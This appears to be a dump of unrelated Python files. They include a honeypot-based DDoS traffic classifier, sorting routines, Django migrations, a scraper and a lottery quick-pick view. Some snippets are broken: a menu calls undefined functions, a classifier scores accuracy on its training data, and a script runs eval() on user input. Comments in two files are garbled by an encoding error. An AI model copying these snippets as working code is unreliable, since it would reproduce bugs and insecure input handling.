text stringlengths 8 6.05M |
|---|
from time import time
start = time()
sum = 0
for i in range(1,1000):
sum += i ** i
print str(sum)[-10:]
print "Time: {0} secs".format(time()-start) |
# -*- coding: utf-8 -*-
import zmq
import os
# connect and open to ryuData App
# os.system("xterm -e \"python2 ryu-restapi.py\" &")
# os.system("xterm -e \"python2 cpusingle.py\" &")
# time.sleep(5)
# print "Done"
print "Please Wait ....."
import numpy as np
import pandas as pd
import sched
import time
import subprocess
import sys
from twisted.internet import task, reactor
from sklearn import svm
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier, GradientBoostingClassifier
from sklearn.svm import LinearSVC, SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import cross_val_score
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import precision_recall_fscore_support
from sklearn.preprocessing import LabelEncoder
from subprocess import Popen, PIPE, STDOUT
import matplotlib.pyplot as plt
import seaborn as sns
from twisted.internet import task, reactor
import warnings
from sklearn.exceptions import ConvergenceWarning, DataConversionWarning
warnings.simplefilter("ignore", ConvergenceWarning)
warnings.simplefilter("ignore", FutureWarning)
warnings.simplefilter("ignore", DataConversionWarning)
import getopt
from scapy.all import *
from scapy import all as scapy
from random import randrange
from scapy.utils import PcapWriter
import strings
import requests
import json
def getType(whoIP):
"""
get type for calculate precision, recall, f1score
"""
arrayType = []
for j in whoIP:
if j == "192.168.3.17" or j == "192.168.3.18" or j == "192.168.3.33":
arrayType.append('NORMAL')
else:
arrayType.append('DDOS')
return arrayType
timeout = 10.0 # Sixty seconds
def doWork():
ts = time.time()
one = (ts)*1000
time1 = int(one)
two = (ts-10)*1000
time2 = int(two)
# print "time now = %s , and time 5 second pass = %s" % (one, two)
print "time 10 second pass = %s , and time now = %s" % (time2, time1)
subprocess.call(["mongoexport",
"--db",
"mnemosyne",
"--collection",
"session",
"--type=csv",
"--fields=_id,protocol,hpfeed_id,timestamp,source_ip,destination_ip,identifier,honeypot",
"-q", """{"timestamp":{$gt:new Date(%s),$lt:new Date(%s)}, "protocol" : "ICMP"}""" % (time2, time1),
"--out",
"output/%s.csv" % time1])
dataset = pd.read_csv('icmp/dataSample/test.csv') # read & prepare data
getDataset = pd.read_csv('output/%s.csv' % time1)
getIP = getDataset['source_ip']
aType = getType(getIP)
trueType = pd.DataFrame(data=aType,columns=['type'])
dataset2 = pd.concat([getDataset, trueType], axis = 1, join_axes=[getDataset.index])
columnz = ['_id','protocol','hpfeed_id','timestamp','source_ip','destination_ip','identifier','honeypot']
columnzz = ['_id','protocol','hpfeed_id','timestamp','source_ip','destination_ip','identifier','honeypot','type']
dropUnsuable = dataset.drop(dataset.columns[0], axis=1) # drop type
if not aType :
print "\n------------ We dont have data to be process ------------\n"
subprocess.call(["rm", "output/%s.csv" % time1])
# subprocess.call(["rm", "output/encode/%s_encode.csv" % time1])
else:
print "\n----------------- data ready to process -----------------"
joinData = pd.concat([dropUnsuable, dataset2], ignore_index=True)
# joinData.to_csv(r'dataSample/testes.csv')
Xa = joinData.drop(columns=['type'])
Ya = joinData['type'].values
labelencoder = LabelEncoder() # prepare for labelEncoder
Xb = Xa.apply(labelencoder.fit_transform) # apply label encoder on "Xa"
Yb = labelencoder.fit_transform(Ya) # apply label encoder on "Ya"
Xb.to_csv(r'output/encode/%s_encode.csv' % time1)
sc_X = StandardScaler() # prepare for StandardScaler
X = sc_X.fit_transform(Xb) # apply label encoder on "X"
Xscaler = pd.DataFrame(X, columns=columnz)
Xscaler.to_csv(r'output/scaler/%s_scaler.csv' % time1)
#split Train
jm = (dataset.index[-1])
arrayTrain = Xb[:jm]
getYtrain = Yb[:jm]
trainScalern = X[:jm]
#split Test
jmt = (dataset.index[-1])+1
arrayTest = Xb[jmt:].reset_index(drop=True)
getYtest = Yb[jmt:]
testScalern = X[jmt:]
dropTest = pd.DataFrame(testScalern, columns=columnz) # call 'X test' array and make them to dataframe
# start execute data with ML algoritm >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start = time.time() #timestart
lin_clf = svm.LinearSVC()
lin_clf.fit(trainScalern, getYtrain) # training "x train" and "y train"
pseudoY_test = lin_clf.predict(dropTest) # data that won to predict by row
X = np.vstack((trainScalern, testScalern))
Y = np.concatenate((getYtrain, pseudoY_test), axis=0)
pseudo_model = svm.LinearSVC()
pseudo_model.fit(X, Y) # try to predict with pseudo using LinierSVC
clf = AdaBoostClassifier(n_estimators=10)
scores = cross_val_score(clf, X, Y) # predict again with AdaBoost
scores.mean()
clf.fit(X, Y)
AccuracY = clf.score(X, Y)
print "Accuracy : ", AccuracY*100, "%"
stop = time.time()
timeF = stop - start
print "--- %s seconds ---" % timeF
prediction = clf.predict(testScalern)
allScore = precision_recall_fscore_support(getYtest, prediction, average='micro')
print "Precision : ", allScore[0]
print "Recall : ", allScore[1]
print "f1 Socre : ", allScore[2]
print prediction
# for rr in prediction:
# if rr == 0 :
# context = zmq.Context()
# # Socket to talk to server
# print("Connecting to ryu-restapi.pyโฆ")
# socket = context.socket(zmq.REQ)
# socket.connect("tcp://localhost:5555")
# # Sending message to Server
# print("Sending request โฆ" )
# socket.send(b"Dattaa")
# # Get the reply.
# message = socket.recv()
# print("Received reply : [ %s ]" % message)
print "\nDone"
print "\n"
pass
l = task.LoopingCall(doWork)
l.start(timeout) # call every sixty seconds
reactor.run() |
import numpy as np
from numpy import linalg as LA
from matrix_utils import getPMatrix
def matrixForPeriod(layers):
[M1Matrix, M2Matrix] = map(matrixForLayer, layers)
MofTwoMatrix = np.dot(M1Matrix, M2Matrix)
return MofTwoMatrix
def matrixForLayer(layer):
result = np.dot(layer.getPMatrix(), layer.getDMatrix())
result = np.dot(result, layer.getPReverseMatrix())
return result
# layers =[layerFirst, layerSecond]
def getResultMatrix(layers, d):
[layerFirst, layerSecond] = layers
AllMMatrix = LA.matrix_power(matrixForPeriod(layers), d)
resultMatrix = np.dot(LA.inv(getPMatrix(
layerFirst.alfa0, layerFirst.n0)), AllMMatrix)
return resultMatrix
# layers =[layerFirst, layerSecond]
def getMatrixPower(layers,d):
[layerFirst, layerSecond] = layers
AllMMatrix = LA.matrix_power(matrixForPeriod(layers), d)
return AllMMatrix
def getResultMatrixWithCa(layers, lastCaLayer, d):
[layerFirst, layerSecond] = layers
AllMMatrix = LA.matrix_power(matrixForPeriod(layers), d)
leftMultiplication =np.dot( LA.inv(getPMatrix(layerFirst.alfa0, layerFirst.n0)),matrixForLayer(lastCaLayer))
resultMatrix = np.dot(leftMultiplication, AllMMatrix)
return resultMatrix
|
from torch import nn
class BasePositionalEmbedding(nn.Module):
def __init__(self) -> None:
super().__init__()
# BasePositionalEmbedding must define
# positional_embedding_size
def forward(self, x_embed, i=0, h=None, metadata_dict={}):
return x_embed, h
def forward_step(self, x_embed, i=0, h=None, metadata_dict={}):
return x_embed, h
class PositionalEmbedding(nn.Module):
"""Positional embeddings built from a list of
"base" positional embeddings like
- ChannelEmbedding,
- SinusoidalEmbedding
- etc.
"""
def __init__(self, base_positional_embedding_list) -> None:
super().__init__()
self.base_positional_embeddings = nn.ModuleList(
base_positional_embedding_list)
self.positional_embedding_size = sum([
pe.positional_embedding_size
for pe in base_positional_embedding_list
])
def forward(self, x_embed, i=0, h=None, metadata_dict={}):
"""Concatenates all the simple_positional_embeddings
on the last dim of x_embed
Args:
x_embed (batch_size, num_tokens, embedding_dim): embedded_sequence
i (int, optional): index of the first token. Defaults to 0.
h (list of tensors, optional): cached values, one for each embedding. Defaults to None.
target (batch_size, num_events_num_channels, optional):
The target tensor (not embedded), can be used compute some quantities. Defaults to None.
Output:
x_embed_with
"""
if isinstance(h, list):
pass
else:
if h is None:
h = [None] * len(
self.base_positional_embeddings
)
new_h_list = []
for positional_embedding, h_pe in zip(self.base_positional_embeddings, h):
x_embed, new_h_pe = positional_embedding.forward(x_embed,
i=i,
h=h_pe,
metadata_dict=metadata_dict)
new_h_list.append(new_h_pe)
return x_embed, new_h_list
def forward_step(self, x_embed, i=0, h=None, metadata_dict={}):
"""Concatenates all the simple_positional_embeddings
on the last dim of x_embed
Args:
x_embed (batch_size, embedding_dim): embedded_sequence
i (int, optional): index of the token in the whole sequence. Defaults to 0.
h (list of tensors, optional): cached values, one for each embedding. Defaults to None.
target (batch_size, num_events_num_channels, optional):
The target tensor (not embedded), can be used compute some quantities. Defaults to None.
"""
if isinstance(h, list):
pass
else:
if h is None:
h = [None] * len(
self.base_positional_embeddings
)
new_h_list = []
for positional_embedding, h_pe in zip(self.base_positional_embeddings, h):
x_embed, new_h_pe = positional_embedding.forward_step(x_embed,
i=i,
h=h_pe,
metadata_dict=metadata_dict)
new_h_list.append(new_h_pe)
return x_embed, new_h_list |
# -*- coding: utf-8 -*-
from datetime import datetime
from google.cloud import storage
import os
import requests
import json
# ML๋ก ์ฐ๊ฒฐ๋๋ ์ฃผ์ ์ค์
addr = ''
URL = addr + ''
# Storage Setting
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = ''
BUCKET_NAME = ''
client = storage.Client()
bucket = client.get_bucket(BUCKET_NAME)
def now():
return datetime.now().strftime('%H:%M:%S')
def filetime():
return datetime.now().strftime('%m%d_%H-%M-%S')
def delete_blob():
for blob in bucket.list_blobs():
bucket.delete_blob(blob_name=blob.name)
print('{} : {} ์ญ์ ํ์ต๋๋ค.'.format(now(), blob.name))
def upload_blob(name, parsed_data):
# ์
๋ก๋ ์ ํด๋ผ์ฐ๋ ๋ด ๊ธฐ์กด ๋ด์ญ ์ญ์
delete_blob()
print("{} : ํด๋ผ์ฐ๋ ์คํ ๋ฆฌ์ง ์ด๊ธฐํ ์๋ฃ".format(now()))
# ์๋ณธ ์
๋ก๋
print("{} : ์
๋ก๋๋ฅผ ์์ํฉ๋๋ค.".format(now()))
original_path = "data" + '/' + name + '/' + 'original' + '.png' #๋ก์ปฌ ๊ฒฝ๋ก
original_upload_name = name + '.png' #ํด๋ผ์ฐ๋์ ์ฌ๋ผ๊ฐ๋ ์ด๋ฆ
original_img = bucket.blob(original_upload_name)
original_img.upload_from_filename(filename=original_path)
print("{} : {}๋ฅผ {}๋ก ํด๋ผ์ฐ๋์ ์
๋ก๋ ํ์์ต๋๋ค.".format(now(), original_path, original_upload_name))
global predict
# ๊ฐ ํ์ผ ์
๋ก๋
#idx = 0
for i in range(len(parsed_data)): # ๊ฒฝ๊ณ์ ์ค๋ธ์ ํธ๋ง๋ค
croped_upload_name = name + '-' + str(i) + '_' + parsed_data[i][0] + '.jpg' #ํด๋ผ์ฐ๋์ ์ฌ๋ผ๊ฐ๋ ์ด๋ฆ
try:
croped_image = bucket.blob(croped_upload_name)
croped_image_path = "data" + '/' + name + '/' + str(i) + '_' + parsed_data[i][0] + '.jpg' #๋ก์ปฌ ๊ฒฝ๋ก
croped_image.upload_from_filename(filename=croped_image_path)
print("{} : {}๋ฅผ {}๋ก ํด๋ผ์ฐ๋์ ์
๋ก๋ ํ์์ต๋๋ค.".format(now(), croped_image_path, croped_upload_name))
except:
pass
print("{} : ํด๋ผ์ฐ๋ ์
๋ก๋ ์๋ฃ!".format(now()))
def delete_file_dir(mydir):
filelist = [f for f in os.listdir(mydir)]
for f in filelist:
os.remove(os.path.join(mydir, f))
print(f + ' is deleted!')
def post_image(img_file, URL, headers):
img = open(img_file, 'rb').read()
#img = img_file
response = requests.post(URL, data=img, headers=headers)
return response
def request_vision(image):
# prepare headers for http request
content_type = 'image/jpeg'
headers = {'content-type': content_type}
res = post_image(image, URL, headers)
print("{} : VISION - ์ธ์ ์๋ฃ".format(now()))
j = json.loads(res.json())
result = j['predict']
return result
|
# A-Z๊น์ง ์ธ๋ฑ์ฑํด์ ๋น๊ตํ ๋ฌธ์์ด๊ณผ ๋น๋์ list ์ ์ธ
alphabet='abcdefghijklmnopqrstuvwxyz'
result=[0 for _ in range (26)]
S=input()
for i in S:
# loop ๋ด์์ ์ธ๋ฑ์ฑํ์ฌ ์กฐ๊ฑด์ ๋ง๋ ์ํ๋ฒณ์ ์ฐพ์ผ๋ฉด
# ๊ฐ์ +1 ํด์ค๋ค
idx = alphabet.find(i)
result[idx] += 1
# ์ฒ์์ int๊ฐ์ผ๋ก initํ์ผ๋ ์๋์๊ฐ์ด ์ถ๋ ฅํ๊ธฐ ์ํด str์ผ๋ก ๊ฐ์ ์นํํจ
result=[str(k) for k in result]
print(' '.join(result))
|
import unittest
factor = lambda n: (i for i in range(1, n + 1) if n % i == 0)
is_prime = lambda n: list(factor(n)) == [1, n]
primes = lambda n: (i for i in range(2, n + 1) if is_prime(i))
INPUT_SAMPLE = """\
20 -> 2 3 5 7 11 13 17 19
"""
class Test(unittest.TestCase):
def test_input_sample(self):
n, result = INPUT_SAMPLE.split(" -> ")
n = int(n)
result = list(map(int, result.split()))
self.assertEqual(list(primes(n)), result)
if __name__ == "__main__":
unittest.main()
|
"""
Write a function to find the longest common prefix string amongst an array of strings.
"""
class LCPSolution:
def longestCommonPrefix (self, strs):
"""
:type strs: List[str]
:rtype: str
"""
if len(strs) == 0:
return ""
for i in range(len(strs[0])):
for string in strs[1:]:
if i >= len(string) or strs[0][i] != string[i]:
return strs[0][:i]
return strs[0]
if __name__ == '__main__':
sol = LCPSolution()
assert (sol.longestCommonPrefix(['abc', 'abcde', 'abbbb', 'abcd']) == 'ab')
assert(sol.longestCommonPrefix(['abcde', 'cbbbb', 'bvcd']) == '')
assert(sol.longestCommonPrefix(['abcde', 'abbbb', 'avcd']) == 'a')
assert(sol.longestCommonPrefix([]) == '')
assert(sol.longestCommonPrefix(['a']) == 'a')
assert(sol.longestCommonPrefix(['aa', 'a']) == 'a')
assert(sol.longestCommonPrefix(["abab","aba",""]) == '')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-21 19:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('experiment', '0014_crowd_members_member_num'),
]
operations = [
migrations.AlterField(
model_name='crowd_members',
name='member_num',
field=models.IntegerField(default=None),
),
]
|
print(" liu ")
import numpy as np
print(" {}".format(np.ones(1))) |
import test as t
###imprimir menu
miubicacion = "Donostia"
mizona = 1
print("***MENU DE RENFE***")
print("1.- Ida\t")
print("2.- Ida y Vuelta\t")
print("3.- Bono Mensual")
opc=input("Su opcion:")
if opc=="1":
ida()
elif opc=="2":
idayvuelta()
elif opc=="3":
mensual()
else:
print("Numero incorrecto")
"""elif opc==3:has selecci"""
|
my_dict = {'key1': 'value1', 'key2': 'value2'}
# print(my_dict['key1']) # value1
prices_lookup = {'apple': 2.99, 'oranges': 1.99, 'milk': 5.80}
# print(prices_lookup['apple']) # 2.99
d = {'k1': 123, 'k2': [0,1,2], 'k3': {'insideKey': 100}}
# print(d['k2']) # [0, 1, 2]
# print(d['k2'][2]) # 2
# print(d['k3']['insideKey']) # 100
d = {'key1': ['a','b','c']}
my_list = d['key1'] # ['a','b','c']
letter = my_list[2] # 'c'
letter.upper() # 'C'
d['key1'][2].upper() # 'C'
d = {'k1': 100, 'k2': 200}
d['k3'] = 300 # Add a new key value pair
# print(d) # {'k1': 100, 'k2': 200, 'k3': 300}
d['k1'] = 'New Value' # Assign new value to an existing key
# print(d) # {'k1': 'New Value', 'k2': 200, 'k3': 300}
d = {'k1': 100, 'k2': 200, 'k3': 300}
# print(d.keys()) # dict_keys(['k1', 'k2', 'k3'])
# print(d.values()) # dict_values([100, 200, 300])
# print(d.items()) # dict_items([('k1', 100), ('k2', 200), ('k3', 300)]) |
from Bio.SeqIO import parse
import matplotlib.pyplot as plt
import numpy as np
d = np.array([len(r) for r in parse('uniprot_sprot.fasta', 'fasta')])
# print(d)
plt.hist(d[(d > 100) & (d < 400)])
plt.show()
print(len(d))
print(len(d[d > 500]))
print('median', np.median(d))
subset = d[(d > 100) & (d < 400)]
print(len(subset))
print('media', np.median(subset))
|
def testEqual(str1,str2):
print(str1==str2)
def reverse(text):
reverse_str=''
for i in range(len(text)-1,-1,-1):
reverse_str = f'{reverse_str}{text[i]}'
return reverse_str
testEqual(reverse("happy"), "yppah")
testEqual(reverse("Python"), "nohtyP")
testEqual(reverse(""), "") |
import numpy
def arrays(arr):
# complete this function
return numpy.array(list(reversed(arr)), float)
|
# Generated by Django 3.1.5 on 2021-03-26 07:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0026_auto_20210326_1320'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='LastSearcheTag',
field=models.TextField(default='RENTYUG'),
),
]
|
# coding=utf-8
'''
functions to generate embedding for each word and sentences
'''
from functools import reduce
from typing import List
from torch import Tensor
import torch
import numpy as np
import vocab
# look_up the dict to convert to indices and do the padding
def corpus_to_indices(vocab: vocab.Vocab, corpus: List[List[str]]) -> Tensor:
max_sent_len = max(map((lambda x: len(x)), corpus))
# indices are initialized with the index of '<pad>'
for i, sent in enumerate(corpus):
while len(sent) < max_sent_len:
sent.append("<pad>")
indices_in_lists = vocab.words2indices(corpus)
return torch.tensor(indices_in_lists, dtype=torch.long)
'''
indices = torch.zeros(len(corpus), max_sent_len, dtype=torch.int32)
for i, sent in enumerate(corpus):
sent_indices = np.zeros((1, max_sent_len))
for j, word in enumerate(sent):
sent_indices[j] = vocab.word2id[word]
indices[i] = torch.tensor(sent_indices)
return indices
'''
# look up the dict for indices and convert to varied length sents
def indices_to_corpus(vocab: vocab.Vocab, indices: Tensor) -> List[List[str]]:
corpus = []
for i in range(indices.shape[0]):
sent = []
for j in range(indices.shape[1]):
idx = indices[i][j]
if idx == 0:
break
sent.append(vocab.id2word[idx])
corpus.append(sent)
return corpus
|
from collections import defaultdict
def is_permutation(s1, s2):
s1_store = defaultdict(lambda: 0)
for c in s1:
s1_store[c] += 1
for c in s2:
s1_store[c] -= 1
if s1_store[c] < 0:
return False
return True
|
# Generated by Django 2.2 on 2019-09-16 08:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('status', '0002_account_displaydownpayment'),
]
operations = [
migrations.AlterField(
model_name='interests',
name='year',
field=models.CharField(default=0, max_length=50, null=True),
),
]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-17 02:04
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('evesde', '0002_solarsystem'),
]
operations = [
migrations.AlterField(
model_name='constellation',
name='regionID',
field=models.ForeignKey(db_column='regionID', on_delete=django.db.models.deletion.CASCADE, to='evesde.Region'),
),
]
|
import time
from concurrent import futures
class sortingAlgorithms(object):
def __init__(self):
pass
def bubbleSort_noThreading(self, arr):
self.arr = arr
for i in range(0, len(self.arr)+1, 1):
swapped = False
for j in range(0, len(self.arr)-1-i, 1):
if self.arr[j] > self.arr[j+1]:
# Swap elements
self.arr[j], self.arr[j+1] = self.arr[j+1], self.arr[j]
swapped = True
if not swapped:
break
else:
continue
return self.arr
def bubbleSort_withThreading(self, arr):
self.arr = arr
self.threadingExecutor = futures.ThreadPoolExecutor(max_workers=len(self.arr)**2)
for i in range(0, len(self.arr)+1, 1):
self.thread = self.threadingExecutor.submit(self.bubbleSort_threadingChunk, self.arr, i)
self.arr = self.thread.result()[0]
if not self.thread.result()[1]:
break
else:
continue
return self.arr
def bubbleSort_threadingChunk(self, arr, i):
swapped = False
for j in range(0, len(arr)-i-1, 1):
if arr[j] > arr[j+1]:
# Swap elements
arr[j], arr[j+1] = arr[j+1], arr[j]
swapped = True
return [arr, swapped]
def recursiveBubbleSort(self, arr):
self.arr = arr;
def bubble(array):
for i, num in enumerate(array):
try:
if array[i+1] < array[i]:
# Swap values
array[i] = array[i+1]
array[i+1] = num
# Recall bubble
bubble(array)
except IndexError as _ix_:
pass
return bubble(self.arr)
def insertionSort_noThreading(self, arr):
self.arr = arr
for i in range(0, len(self.arr), 1):
for j in range(i, 0, -1):
if self.arr[j] < self.arr[j-1]:
# Swap elements
self.arr[j], self.arr[j-1] = self.arr[j-1], self.arr[j]
return self.arr
def insertionSort_noThreading_secondType(self, arr):
self.arr = arr
for i in range(0, len(self.arr), 1):
self.key = self.arr[i]
self.j = i - 1
while self.j >= 0 and self.arr[self.j] > self.key:
self.arr[self.j + 1] = self.arr[self.j]
self.j -= 1
self.arr[self.j+1] = self.key
return self.arr
def insertionSort_withThreading(self, arr):
self.arr = arr
self.threadExecutor = futures.ThreadPoolExecutor(max_workers = len(self.arr)**2)
for i in range(0, len(self.arr), 1):
# Submit thread to the executor
self.thread = self.threadExecutor.submit(self.insertionSort_threadingChunk, i, self.arr)
# Returns an array
self.arr = self.thread.result()
return self.arr
def insertionSort_threadingChunk(self, i, arr):
self.threadingArr = arr
self.key = self.threadingArr[i]
self.j = i - 1
while self.j >= 0 and self.threadingArr[self.j] > self.key:
self.threadingArr[self.j+1] = self.threadingArr[self.j]
self.j -= 1
self.threadingArr[self.j + 1] = self.key
return self.threadingArr
def recursiveInsertionSort(self, arr):
self.arr = arr
# The "func" function will be used for the recursive insertion sort, so we avoid calling a self.* kind of method more times at once ( recursion )
def func(arr, n):
if n <= 1:
return
func(arr, n-1)
last = arr[n-1]
j = n-2
while j >= 0 and arr[j] > last:
arr[j+1] = arr[j]
j -= 1
arr[j+1] = last
return func(self.arr, len(self.arr))
def quickSort(self, arr):
self.arr = arr
def partition(arr, low, high):
i = low
pivot = arr[high]
# 4 5 3 8 9 7
for j in range(low, high, 1):
if arr[j] < pivot:
# Swap elements
arr[i], arr[j] = arr[j], arr[i]
# Increment i
i += 1
# Swap *i* index value with the pivot
arr[i], arr[high] = arr[high], arr[i]
return i
def quickSort_ALGORITHM(arr, low, high):
if low < high:
partitionIndexSplitter = partition(arr, low, high)
quickSort_ALGORITHM(arr, low, partitionIndexSplitter-1)
quickSort_ALGORITHM(arr, partitionIndexSplitter+1, high)
return quickSort_ALGORITHM(self.arr, 0, len(self.arr)-1)
def mergeSort(self, arr):
self.arr = arr
def mergeSort_ALGORITHM(array):
if len(array) > 1:
# Split it into halves
middle = len(array) //2
L = array[:middle]
R = array[middle:]
mergeSort_ALGORITHM(L)
mergeSort_ALGORITHM(R)
i = j = k = 0
while i < len(L) and j < len(R):
if L[i] < R[j]:
array[k] = L[i]
i += 1
k += 1
else:
array[k] = R[j]
j += 1
k += 1
# Add left overs
while i < len(L):
array[k] = L[i]
i += 1
k += 1
while j < len(R):
array[k] = R[j]
j += 1
k += 1
mergeSort_ALGORITHM(self.arr)
return self.arr
compareObject = sortingAlgorithms()
RANGE_STOP = eval(input("RANGE STOP > "))
n = list(range(1, RANGE_STOP+1))[::-1]
start = time.perf_counter()
compareObject.mergeSort(n)
print(n)
print("Time needed : {0}".format(time.perf_counter() - start))
|
import math
import unittest
from tree_utils import Node
def build_minimal_bst(array, start, end):
"""Build a minimal height binary search tree given a sorted arry.
Child trees have equal size, so the resulted bst might not be complete.
"""
if start >= end:
return None
mid = (start + end) // 2
root = Node(array[mid])
root.left = build_minimal_bst(array, start, mid)
root.right = build_minimal_bst(array, mid + 1, end)
return root
def build_complete_bst(array, start, end):
"""Build a complete binary search tree given a sorted array."""
if start >= end:
return None
# find the root node index in the given array
l = end - start
height = int(math.log(l, 2))
num_of_leafs = l - (2 ** height - 1)
if num_of_leafs > 2 ** (height - 1):
left_tree_size = 2 ** height - 1
else:
left_tree_size = l - 2 ** (height - 1)
root_index = start + left_tree_size
# recursively build bst
root = Node(array[root_index])
root.left = build_complete_bst(array, start, root_index)
root.right = build_complete_bst(array, root_index + 1, end)
return root
class BuildMinimalBSTTest(unittest.TestCase):
def setUp(self):
self.build_bst = build_minimal_bst
def test_build_empty(self):
self.assertEqual(self.build_bst([], 0, 0), None)
def test_build_one_node(self):
root = self.build_bst([0], 0, 1)
self.assertEqual(root.data, 0)
self.assertEqual(root.left, None)
self.assertEqual(root.right, None)
def test_build_full(self):
root = self.build_bst([0, 1, 2], 0, 3)
self.assertEqual(root.left.data, 0)
self.assertEqual(root.left.left, None)
self.assertEqual(root.left.right, None)
self.assertEqual(root.data, 1)
self.assertEqual(root.right.data, 2)
self.assertEqual(root.right.left, None)
self.assertEqual(root.right.right, None)
def test_build_complete(self):
root = self.build_bst([0, 1, 2, 3], 0, 4)
self.assertEqual(root.data, 2)
self.assertEqual(root.left.data, 1)
self.assertEqual(root.left.left.data, 0)
self.assertEqual(root.left.left.left, None)
self.assertEqual(root.left.left.right, None)
self.assertEqual(root.left.right, None)
self.assertEqual(root.right.data, 3)
self.assertEqual(root.right.left, None)
self.assertEqual(root.right.right, None)
class BuildCompleteBSTTest(BuildMinimalBSTTest):
def setUp(self):
self.build_bst = build_complete_bst
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='School',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),
('name', models.CharField(max_length=150)),
('district', models.CharField(max_length=150)),
],
),
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),
('name', models.CharField(max_length=150)),
('age', models.IntegerField(default=0)),
('location', models.IntegerField(default=400010)),
('days_present', models.IntegerField(default=0)),
('days_total', models.IntegerField(default=0)),
('marks', models.TextField(blank=True)),
('sponsored', models.BooleanField(default=False)),
('school', models.ForeignKey(to='NGO.School')),
],
),
migrations.CreateModel(
name='VolunteerProfile',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),
('contact', models.IntegerField(unique=True, default=0)),
('user', models.OneToOneField(related_name='profile', to=settings.AUTH_USER_MODEL)),
],
),
]
|
# Level 14
# http://www.pythonchallenge.com/pc/return/italy.html
from PIL import Image
image = Image.open('wire.png')
delta = [(1, 0), (0, 1), (-1, 0), (0, -1)]
out = Image.new('RGB', [100, 100])
x, y, p = -1, 0, 0
d = 200
while d / 2 > 0:
for v in delta:
steps = d // 2
for s in range(steps):
x, y = x + v[0], y + v[1]
out.putpixel((x, y), image.getpixel((p, 0)))
p += 1
d -= 1
out.show()
# Next level: http://www.pythonchallenge.com/pc/return/cat.html
# http://www.pythonchallenge.com/pc/return/uzi.html
|
import requests
from bs4 import BeautifulSoup
class spider:
def __init__(self):
self.url = "http://vip.lysy90store.xyz/cities"
self.header = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'}
def spider_lysy90(self):
response = requests.get(self.url,headers = self.header)
lysy90 = response.content
print(response.content)
page = BeautifulSoup(lysy90,'html.parser')
page_infos = page.find_all('p','hc-2-name')
print(page_infos)
for page_info in page_infos:
print(page_info)
spider().spider_lysy90() |
from __future__ import division
from django.shortcuts import render
from yoolotto.lottery.views import *
from yoolotto.lottery.ticket.views import *
from yoolotto.second_chance.models import *
from yoolotto.user.models import *
from yoolotto.coin.models import *
from yoolotto.lottery.models import LotteryDraw
from yoolotto.fantasy_lottery.models import *
from yoolotto.lottery.game.base import LotteryGame, LotteryPlayInvalidException, LotteryResultsInvalidException
# Create your views here.
def validate_numbers(numbers,game_type):
if not numbers:
raise LotteryPlayInvalidException("No number detected in white ball")
if len(numbers)<5:
raise LotteryPlayInvalidException("Please enter all white ball numbers")
if len(numbers)==5:
raise LotteryPlayInvalidException("Please enter Megaball number")
print numbers
print "numbers",type(numbers)
white = numbers[0:5]
powerball = numbers[5]
print "white",white
print "powerball",powerball
print "length of white",len(set(white))
if len(set(white)) != 5:
raise LotteryPlayInvalidException("Duplicate Number %s" % white)
if game_type == 21:#megamillion
for number in white:
if number not in xrange(1, 76):
raise LotteryPlayInvalidException("Please enter valid white ball number")
if powerball not in xrange(1, 16):
raise LotteryPlayInvalidException("Please enter valid Megaball number")
if game_type == 20:
print "white",white
for number in white:
if number not in xrange(1, 60):
print "number",number
raise LotteryPlayInvalidException("Invalid White Ball Number %s" % number)
if powerball != -1:
if powerball not in xrange(1, 36):
raise LotteryPlayInvalidException("Invalid Powerball Number %s" % powerball)
return True
class QuickPick(View):
@rest
@Authenticate()
def post(self,request):
data = json.loads(request.body)
user = data["user"]
user_id = user
game_type = data["game_type"]
division = data['division']
submission = uuid.uuid4().hex[:16]
print "submissssion",submission
try:
client_login_record, created = UserClientLogin.objects.get_or_create(device=request.yoo['device'])
except:
client_login_record = UserClientLogin.objects.filter(device=request.yoo['device'])[0]
#date = datetime.datetime.strptime(draw_date, "%Y-%m-%d").date()
lines_no = data['lines']
date = datetime.datetime.strptime(data["drawingDate"], "%Y-%m-%d").date()
if division == 'CA':
game_types = {20:20,21:21}
#components = {20:"Powerballca",21:"MegaMillionsCA"}
division_id = 2
else:
game_types = {20:1,21:2}
#components = {1:"Powerball",2:"MegaMillions"}
division_id = 1
game_types = game_types[game_type]
draw, created = LotteryDraw.objects.get_or_create(component=game_types, date=date,division_id=division_id)
ticket_record,created = FantasyTicket.objects.get_or_create(user_id = user_id,division = division,gameType = game_type,lines_no = lines_no,draw_id = draw.id)
submission_record = None
numbers = []
if game_type == 21:#megamillion
for line in range(0,lines_no):
import random
white_ball = random.sample(range(1,76),5)
power_ball = random.sample(range(1,16),1)
numbers1 = white_ball + power_ball
#print numbers
numbers.append(numbers1)
else:
for line in range(0,lines_no):
import random
white_ball = random.sample(range(1,60),5)
power_ball = random.sample(range(1,36),1)
numbers1 = white_ball + power_ball
#print numbers
numbers.append(numbers1)
return {"numbers":numbers}
